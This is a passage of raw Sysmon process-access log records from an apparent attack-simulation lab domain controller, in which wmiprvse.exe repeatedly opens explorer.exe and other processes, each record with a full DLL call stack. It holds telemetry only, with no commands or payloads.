PCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242611Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242610Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242609Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242608Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242607Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242606Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242605Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242604Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242603Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242602Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242601Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242600Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.973{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242599Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.973{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242598Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.972{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242597Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.971{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242596Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.970{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242595Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.970{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72B4A102E9C5626B9C81413DB4588BEA,SHA256=5370E9A3B90974F867417AE83977544D04509981FC99CE241053C0B49765DAA3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242594Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.969{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242593Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.968{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242592Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.968{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242591Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.967{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\S